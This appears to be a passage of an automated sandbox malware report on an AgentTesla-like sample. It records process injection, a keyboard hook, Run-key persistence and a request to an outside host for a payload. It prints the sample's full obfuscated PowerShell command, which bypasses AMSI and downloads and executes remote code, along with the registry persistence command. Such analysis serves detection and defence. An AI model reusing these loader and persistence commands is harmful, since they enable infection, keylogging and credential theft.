46%32%38%46%31%39%41%43%42%37%43%46%32%41%33%46%46%38%34%38%31%38%38%44%37%37%34%32%32%42%38%36%45%33%41%42%38%37%33%33%42%34%46%43%42%32%31%45%31%33%36%33%41%34%36%41%41%44%44%31%44%34%34%30%33%45%36%36%36%33%41%31%44%39%34%30%35%39%41%41%46%39%42%46%43%36%41%31%37%33%35%44%41%38%38%33%43%37%34%42%41%38%39%43%46%37%41%35%38%41%31%32%34%46%36%44%33%33%43%34%45%35%34%46%34%30%37%37%30%38%35%42%39%43%38%45%46%45%45%32%45%35%41%45%34%44%42%39%30%32%39%33%36%46%42%30%41%33%36%46%42%38%39%36%36%45%38%41%38%30%45%30%39%41%37%37%42%39%31%33%46%32%34%42%42%33%33%35%32%43%30%39%43%32%39%36%30%38%30%32%34%41%41%42%43%36%32%42%31%41%46%37%30%42%31%35%46%35%46%31%34%32%32%45%30%38%31%36%34%34%38%44%42%46%35%32%30%34%42%35%46%46%36%38%42%41%39%44%2D%2D%43%33%35%45%42%38%36%34%32%34%36%38%37%34%37%42%45%37%36%31%36%36%43%32%45%45%32%31%44%44%39%35%38%34%37%33%33%45%34%36%44%36%38%30%38%42%35%36%39%33%45%46%45%36%43%46%32%38%44%35%39%36%33%39%36%38%33%43%32%31%38%33%42%30%42%42%35%31%38%31%43%39%30%31%39%37%43%46%32%33%41%33%36%43%43%39%32%46%37%31%42%36%33%39%31%33%46%42%34%31%38%45%34%46%30%38%35%44%42%39%38%
Data received	%44%31%39%34%32%41%33%43%39%34%33%42%38%42%35%36%41%32%44%45%30%42%46%38%35%44%2D%2D%43%43%46%34%32%35%41%32%37%46%44%31%39%39%46%41%31%31%32%41%36%33%45%32%41%37%42%45%44%30%46%34%36%34%44%41%36%36%30%32%33%30%42%33%32%33%42%39%43%37%39%37%34%45%34%45%36%35%42%45%46%33%42%39%43%43%33%39%36%45%43%31%39%39%34%37%42%37%32%46%30%31%36%41%32%41%30%38%44%34%42%39%37%35%38%42%30%39%31%39%46%31%34%46%42%39%30%42%31%37%31%42%41%33%38%35%43%39%37%43%41%41%31%36%38%33%45%31%41%43%41%45%36%43%37%45%44%39%44%43%45%43%31%33%45%30%38%42%44%34%41%46%33%35%46%30%35%43%34%31%35%46%34%38%38%42%35%43%30%46%45%45%31%42%33%45%43%33%36%45%43%33%32%34%46%32%45%35%45%43%42%45%37%31%42%38%35%32%45%41%30%39%34%32%45%32%46%30%34%38%45%35%35%46%41%44%37%42%30%37%30%33%38%42%34%38%37%42%34%32%31%35%46%37%41%41%33%32%30%31%30%41%36%35%37%41%30%36%32%43%35%46%33%33%31%36%44%31%35%36%43%43%44%36%30%32%37%2D%2D%44%44%32%42%44%30%44%44%43%43%30%35%32%43%46%36%46%41%35%30%45%32%32%41%38%33%32%41%39%46%36%35%31%33%46%38%46%46%35%43%34%39%37%35%42%33%41%39%45%43%31%38%31%43%30%41%46%34%38%39%39%35%38%45%44%36%41%34%34%34%35%31%41%45%34%46%42%41%39%35%44%46%2D%2D%46%38%42%42%44%44%33%35%34%34%33%45%30%45%32%42%44%38%30%34%36%37%42%39%42%39%32%36%34%44%41%45%33%35%31%42%45%30%44%34%36%44%45%31%34%35%30%32%38%38%34%35%41%43%44%43%45%41%33%38%35%34%43%41%44%36%35%42%39%44%42%36%35%41%31%42%33%33%41%39%45%42%43%43%34%41%38%41%42%43%44%46%35%43%45%30%42%32%44%35%39%43%35%44%31%37%43%45%39%34%36%42%36%31%44%41%36%35%43%38%35%37%31%41%32%38%36%44%35%34%43%44%39%37%32%43%35%44%34%39%36%33%43%35%31%36%30%35%44%38%45%35%39%37%36%30%45%43%45%33%33%42%41%42%42%33%44%36%38%43%46%31%38%43%32%35%30%37%30%43%39%38%44%43%39%34%43%32%34%45%45%32%36%30%35%44%33%37%39%42%33%45%39%32%45%41%31%42%35%41%31%33%43%45%30%31%38%32%35%44%38%31%35%39%35%30%36%42%37%36%31%44%30%44%36%34%30%32%46%36%45%34%36%39%42%42%30%43%30%35%41%45%35%35%45%36%39%41%46%33%38%39%31%42%41%30%32%43%43%34%33%32%39%41%34%30%35%45%44%38%37%45%33%39%36%41%45%38%43%43%32%34%38%31%41%34%31%35%41%36%32%36%37%41%42%41%32%30%41%46%38%32%30%37%32%39%30%45%31%36%39%41%42%38%30%35%45%38%30%36%35%37%44%41%32%45%45%43%43%45%32%36%43%33%32%38%33%37%37%42%33%39%41%41%42%38%38%38%33%33%44%37%34%46%34%36%37%31%33%46%41%34%44%38%30%41%38%33%45%31%34%41%33%32%39%31%45%34%31%46%30%45%30%39%43%46%33%30%44%32%32%32%35%46%43%45%33%41%44%37%46%39%31%41%31%42%33%42%30%38%39%34%44%44%33%33%31%37%32%46%42%31%35%36%34%45%30%43%43%39%34%31%37%38%41%36%38%44%43%30%36%33%45%31%33%46%41%37%32%39%36%46%45%31%34%42%45%38%33%45%43%45%33%46%35%32%44%38%44%44%41%44%41%31%39%33%31%45%39%46%43%36%36%30%44%42%42%41%37%33%30%46%37%32%32%34%35%33%36%30%38%35%30%44%38%37%39%44%35%30%31%45%42%34%32%38%42%33%39%43%30%46%39%41%36%42%33%33%39%34%39%39%38%35%36%41%42%45%44%39%35%35%36%32%41%45%46%39%41%41%31%41%33%37%32%33%45%37%41%43%44%41%32%43%35%36%36%32%36%35%34%36%41%37%46%46%32%37%38%33%35%32%
Data received	9%39%41%46%43%46%44%31%32%35%44%30%38%32%41%41%39%30%42%30%41%46%37%31%45%46%46%39%34%33%43%30%39%39%30%45%35%45%39%39%37%34%30%35%34%39%35%45%31%33%41%45%32%39%36%42%37%32%46%36%39%35%45%37%32%45%33%38%37%38%36%44%33%42%36%35%42%38%38%30%44%46%32%45%39%33%37%30%33%43%34%38%41%32%46%33%46%46%45%35%31%33%41%34%33%31%45%34%36%43%45%32%31%41%46%37%45%37%39%34%39%32%33%44%42%46%30%37%32%30%31%46%39%37%32%31%32%43%31%38%32%35%36%31%35%42%33%35%45%35%39%37%36%34%39%38%33%45%41%41%33%43%38%43%42%37%46%38%37%39%43%33%45%39%38%36%35%43%31%46%2D%2D%32%45%32%32%46%2D%2D%36%46%37%34%33%46%37%35%34%38%30%33%43%46%36%34%31%43%33%2D%2D%35%46%39%46%38%32%34%31%36%33%42%44%44%38%42%31%42%31%44%37%45%37%42%46%39%33%36%36%34%39%30%36%37%41%32%37%30%37%37%38%32%46%34%45%31%37%41%31%30%37%30%37%37%30%43%39%34%43%34%35%38%43%42%46%33%38%45%33%37%31%34%39%46%41%34%46%42%33%35%32%46%34%33%34%45%38%33%46%42%43%34%42%33%45%44%42%46%43%33%42%35%38%35%30%43%35%37%39%33%37%2D%2D%32%37%30%35%44%32%36%38%46%43%31%38%34%46%32%43%37%34%30%43%43%39%37%44%46%30%42%31%37%46%32%37%34%38%37%44%45%30%44%36%31%39%43%43%31%2D%2D%33%42%44%31%38%37%34%34%32%37%34%36%32%37%32%39%32%46%34%37%41%38%34%44%46%33%30%31%36%41%31%41%38%35%36%41%38%44%43%32%43%32%44%34%38%31%36%44%35%34%45%33%30%37%44%30%39%32%32%36%39%45%32%30%34%37%37%31%36%37%38%37%44%43%34%44%37%44%33%33%33%38%42%35%42%34%39%42%38%35%41%39%33%45%42%32%45%30%31%32%34%35%34%42%45%2D%2D%42%46%44%45%36%34%32%45%35%34%36%
Data received	1%38%35%34%31%41%34%33%33%43%43%32%34%42%39%30%46%32%38%37%43%36%34%38%38%35%35%41%31%39%46%34%36%33%33%34%33%44%33%45%35%44%46%35%30%43%45%30%43%32%41%44%42%41%30%33%32%31%30%34%39%34%36%45%30%36%33%30%43%41%35%45%32%44%30%34%46%37%36%34%45%45%37%39%33%43%35%30%42%46%39%42%43%34%39%42%43%43%30%32%39%31%33%35%35%36%31%32%36%35%34%31%42%41%34%31%37%34%45%37%38%30%43%42%30%31%36%34%46%34%32%33%37%34%41%38%39%37%38%45%31%32%45%43%38%45%36%36%46%31%32%32%46%45%38%46%39%42%31%35%37%32%38%46%35%31%44%45%43%38%44%37%32%43%33%36%35%38%39%37%35%43%43%39%32%35%32%31%39%37%37%38%35%30%41%30%46%35%31%42%33%42%37%32%39%46%31%45%31%42%43%39%39%36%42%43%36%37%34%45%32%46%39%36%39%46%34%43%36%45%31%44%30%42%35%39%41%44%46%34%46%33%39%30%46%30%39%45%46%35%34%41%36%44%42%32%31%42%36%45%42%37%33%35%33%33%39%36%30%32%2D%2D%31%33%33%43%34%42%38%35%39%30%46%44%39%38%46%39%45%45%43%43%39%37%35%37%46%44%30%44%34%45%43%31%33%36%46%30%43%37%36%41%33%42%44%41%39%44%42%45%42%44%33%39%33%41%37%36%31%39%39%43%42%37%43%38%36%42%35%38%45%42%30%39%30%37%38%30%38%30%33%32%32%32%39%2D%2D%46%41%30%44%39%38%30%38%32%39%37%37%31%46%43%32%38%38%34%38%41%41%36%39%31%46%46%30%36%33%38%31%39%35%31%36%35%39%46%46%36%32%39%30%34%33%31%41%45%45%45%30%34%33%38%30%33%38%43%32%34%39%37%41%33%39%31%31%39%41%43%42%41%45%44%36%30%31%39%37%34%32%46%32%30%45%41%30%37%38%35%34%34%41%32%34%43%46%31%45%38%32%38%44%34%42%41%34%33%44%44%39%30%32%32%42%44%33%41%34%30%41%42%33%42%34%39%32%39%33%

Poweshell is sending data to a remote host (1 event)

Data sent

GET /.well-known/pki-validation/Attack.jpg HTTP/1.1 Host: dreamwatchevent.com Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 9, 2021, 8 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (46 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Google Chrome User Data Check	rule	Chrome_User_Data_Check_Zero
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Take ScreenShot	rule	ScreenShot
description	browser info stealer	rule	infoStealer_browser_Zero
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\Protected Client.js"
cmdline	"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\Protected Client.js"
cmdline	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\Protected Client.js"

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 9, 2021, 8:01 p.m.	process_identifier: 2564 region_size: 495616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004a4	1	0	0

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\lol

reg_value

C:\Users\test22\AppData\Roaming\Protected Client.js

A potential heapspray has been detected. 108 megabytes was sprayed onto the heap of the powershell.exe process (1 event)

count

1733

name

heapspray

process

powershell.exe

total_mb

108

length

65536

protection

PAGE_READWRITE

Potential code injection by writing to the memory of another process (5 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Sept. 9, 2021, 8:01 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ªB0îâ,cîâ,cîâ,cZ~Ýcüâ,cZ~ßcOâ,cZ~Þcðâ,cç¨cïâ,cpBëcìâ,cÕ¼/bôâ,cÕ¼)bÔâ,cÕ¼(bÌâ,cç¿cûâ,cîâ-cñã,cy¼%b±â,c\|¼Ócïâ,cy¼.bïâ,cRichîâ,cPELMSaà l÷0@ÜTKP80l8Älhl@0t.text¶ `.rdatao0p@@.data\= @À.tls à@À.gfids0ð@@.rsrcTKL¢@@.reloc8P:î@B base_address: 0x00400000 process_identifier: 2564 process_handle: 0x000004a4	1	1
WriteProcessMemory Sept. 9, 2021, 8:01 p.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ ´tE¸wE²tE..¡FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶F¡FP¶FP¶FP¶FP¶FP¶FP¶FP¶F¡Fÿÿÿÿ¸wE¨¢F¨¢F¨¢F¨¢F¨¢F¡F8zE¸{EEè¡F§FCPSTPDT°¢Fð¢Fÿÿÿÿÿÿÿÿÿÿÿÿ ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ§Fþÿÿÿþÿÿÿu0Ï!tåa¾e¸Â¢z»^ âÈ¨346E.?AVtype_info@@46E.?AVbad_alloc@std@@46E.?AVbad_array_new_length@std@@46E.?AVlogic_error@std@@46E.?AVlength_error@std@@46E.?AVout_of_range@std@@46E.?AV_Facet_base@std@@46E.?AV_Locimp@locale@std@@46E.?AVfacet@locale@std@@46E.?AU_Crt_new_delete@std@@46E.?AVcodecvt_base@std@@46E.?AUctype_base@std@@46E.?AV?$ctype@D@std@@46E.?AV?$codecvt@DDU_Mbstatet@@@std@@46E.?AVbad_exception@std@@46E.H46E.?AVfailure@ios_base@std@@46E.?AVruntime_error@std@@46E.?AVsystem_error@std@@46E.?AVbad_cast@std@@46E.?AV_System_error@std@@46E.?AVexception@std@@ base_address: 0x0046a000 process_identifier: 2564 process_handle: 0x000004a4	1	1
WriteProcessMemory Sept. 9, 2021, 8:01 p.m.	buffer: base_address: 0x0046e000 process_identifier: 2564 process_handle: 0x000004a4	1	1
WriteProcessMemory Sept. 9, 2021, 8:01 p.m.	buffer: +ÔÔ?¤Ø¾Ø?Ù?)s?ÚuZ55g;Ù.~~Dñìð??m(À'ÆØØ®õÐûõÛÝÛÝÛ(jk¡iæÞ\F£ã¥w¡Ô(´öä¼éÙ b Er4NPNWN]TUZ[ äøää äö_^îØØäüûüû í9<8;ú` ¢§µ¶³´±²¯°¸ Y base_address: 0x0046f000 process_identifier: 2564 process_handle: 0x000004a4	1	1
WriteProcessMemory Sept. 9, 2021, 8:01 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2564 process_handle: 0x000004a4	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 9, 2021, 8:01 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ªB0îâ,cîâ,cîâ,cZ~Ýcüâ,cZ~ßcOâ,cZ~Þcðâ,cç¨cïâ,cpBëcìâ,cÕ¼/bôâ,cÕ¼)bÔâ,cÕ¼(bÌâ,cç¿cûâ,cîâ-cñã,cy¼%b±â,c\|¼Ócïâ,cy¼.bïâ,cRichîâ,cPELMSaà l÷0@ÜTKP80l8Älhl@0t.text¶ `.rdatao0p@@.data\= @À.tls à@À.gfids0ð@@.rsrcTKL¢@@.reloc8P:î@B base_address: 0x00400000 process_identifier: 2564 process_handle: 0x000004a4	1	1	0

Creates a windows hook that monitors keyboard input (keylogger) (1 event)

Time & API	Arguments	Status	Return	Repeated
SetWindowsHookExA Sept. 9, 2021, 8:01 p.m.	thread_identifier: 0 callback_function: 0x004088ca hook_identifier: 13 (WH_KEYBOARD_LL) module_address: 0x00400000	1	787111	0

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Sept. 9, 2021, 8 p.m.	buffer: GET /.well-known/pki-validation/Attack.jpg HTTP/1.1 Host: dreamwatchevent.com Connection: Keep-Alive socket: 1432 sent: 106	1	106	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2860 called NtSetContextThread to modify thread in remote process 2564
NtSetContextThread Sept. 9, 2021, 8:01 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4388716 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000550 process_identifier: 2564	1	0	0

Powershell script adds registry entries (1 event)

cmd

"c:\windows\system32\windowspowershell\v1.0\powershell.exe" $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) | %{ [system.text.encoding]::utf8.getstring([system.convert]::toint32($_,2)) };i`e`x([system.string]::join('', $gf))cmd /c reg add "hkcu\software\microsoft\windows\currentversion\run" /v "lol" /t reg_sz /f /d "c:\users\test22\appdata\roaming\protected client.js"powershell $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,0110111